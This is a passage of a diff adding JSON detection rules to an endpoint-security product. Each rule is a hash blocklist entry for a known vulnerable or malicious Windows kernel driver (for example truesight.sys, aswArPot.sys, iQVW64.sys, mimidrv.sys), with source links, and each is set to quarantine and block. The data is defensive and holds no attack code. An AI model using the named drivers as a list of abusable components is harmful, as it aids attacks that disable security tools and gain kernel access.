+ "value": "1a2f4063726beaee7aab5e288c678dc70aea2696306a324e0d554b6e0a145b4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36e52b6e-8328-53cc-b48e-123c75c609dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967604Z",
+ "creation_date": "2026-03-23T11:45:29.967606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f08ebddc11aefcb46082c239f8d97ceea247d846e22c4bcdd72af75c1cbc6b0b",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36e92001-e69c-55c7-8498-bc38ba0c992c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142148Z",
+ "creation_date": "2026-03-23T11:45:31.142150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab21cd0feaa710e46f1cc7dfa86a803fb001a561dd68b139018eeab2b3b25cd8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3707775e-d6c7-5e75-bfdb-184d07a0a6a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455080Z",
+ "creation_date": "2026-03-23T11:45:30.455083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24ea733bae1b8722841fb4c6cead93c4c4f0b1248ca9a21601b1ce6b95b06864",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "370a6b67-0ac3-57c4-b8d0-d9bb57689976",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619541Z",
+ "creation_date": "2026-03-23T11:45:29.619543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c628cda1ef43defc00af45b79949675a8422490d32b080b3a8bb9434242bdbf2",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "370e9dad-4f64-529e-a071-9ea11e76cb1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480174Z",
+ "creation_date": "2026-03-23T11:45:31.480178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480187Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "292428ea5c9a276d51c59c63ab0b58b78736bc0e53fc195a959f51b110742dc9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "372b3d73-4409-5794-9830-79459e843f7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620999Z",
+ "creation_date": "2026-03-23T11:45:29.621001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621006Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4db1e0fdc9e6cefeb1d588668ea6161a977c372d841e7b87098cf90aa679abfb",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37325ccb-1daf-5bae-b21f-310e53290bb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970071Z",
+ "creation_date": "2026-03-23T11:45:29.970073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62b89fab85cf77b1e6730d2b55b4f9458f368f89d3ca5672d450e3c3365d8c37",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "373884c0-fbb0-5934-b3ef-d21ef26bb689",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983281Z",
+ "creation_date": "2026-03-23T11:45:29.983283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bacb353363cc29f7f3815a9d01e85cd86202d92378d1ab1b11df1ab2f42f40a",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "373c04ad-70d8-57b0-b541-133c3d0c3a32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820540Z",
+ "creation_date": "2026-03-23T11:45:31.820544Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba82355d4238272001bbe1173a2217224093e048f37b0c1838e81cd0128a737c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "374559fe-5988-5068-8252-1cc2bb02339a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622054Z",
+ "creation_date": "2026-03-23T11:45:29.622055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed302ea33feb557b879f64c4b7835947a9ca31054573e1487f5bbc38449753ff",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37782778-bde9-50c7-923e-0bf8b182f9c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975769Z",
+ "creation_date": "2026-03-23T11:45:29.975771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14ec631a3cff171b86e2b0279c8db436cb88ec705c517bd82a964e2c59def92f",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "377af8d5-feee-558c-b96c-6e2e78deaa06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142987Z",
+ "creation_date": "2026-03-23T11:45:32.142989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c1a4ca2cbac9fe5954763a20aeb82da9b10d028824f42fff071503dcbe15856",
+ "comment": "Vulnerable TfSysMon driver from ThreatFire System Monitor (2013) (aka TfSysMon.sys) [https://github.com/BlackSnufkin/BYOVD/tree/main/TfSysMon-Killer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "378073ef-2346-5362-9e5f-469caad4f94c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143545Z",
+ "creation_date": "2026-03-23T11:45:31.143547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d79182bf82e2e3d3834945811c0f159c16b5ee941803f43fc7c069096a1ddd1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37843c92-6c79-5b95-9cac-ee9f5a39fd07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828543Z",
+ "creation_date": "2026-03-23T11:45:30.828545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828550Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c1a422e8f958e2e2152b8aed18a1723349edcc16b5deed97a320786f98b4e51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "378a9817-754b-5195-877d-a0da37e11a58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469689Z",
+ "creation_date": "2026-03-23T11:45:30.469692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b8401cefd1dbfb754fe00b513784110836c8e938a40cc606903f46503af2943",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37abd82b-fa28-580d-8afc-bb20c4956730",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158841Z",
+ "creation_date": "2026-03-23T11:45:31.158843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a5a443fde50b91739c8d9a321bd9f0bc4cb556f5d64b4cb9fc8a58104a06f5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37ad9827-2a58-5dc3-8b60-46d53cdaa54a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458108Z",
+ "creation_date": "2026-03-23T11:45:30.458111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1675eedd4c7f2ec47002d623bb4ec689ca9683020e0fdb0729a9047c8fb953dd",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37b51c6c-3a30-573a-8492-7af9c9514140",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816397Z",
+ "creation_date": "2026-03-23T11:45:30.816399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816405Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1748436f8e9c251b2c0d1a33499a1aa1a06ae961e1c9911e8c172fe297ab1feb",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37b6a762-1299-5132-9788-5378fc577a2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972142Z",
+ "creation_date": "2026-03-23T11:45:29.972144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37b8b19f-dc76-5f3e-bfb9-09e21b0c16cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472866Z",
+ "creation_date": "2026-03-23T11:45:31.472869Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a26b2ea38eb4e794341933fed73cea751c923808145168656c2b809c774b46b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37b92abb-91a0-55dd-8c5a-818169eaaa1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152288Z",
+ "creation_date": "2026-03-23T11:45:31.152291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "787b3225d73c10a46d08c512793250493cb58fe1252e5f0a226b115a35549111",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37b9a0bc-57b3-587e-a5ef-93bdc9b94df1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141885Z",
+ "creation_date": "2026-03-23T11:45:31.141887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64fcecd846a95c48062a2139f5731bd6c3e68a2ae1fa14e103094389e2ec3328",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "37ba5fad-9181-5556-affa-5acf0ca82d8c",
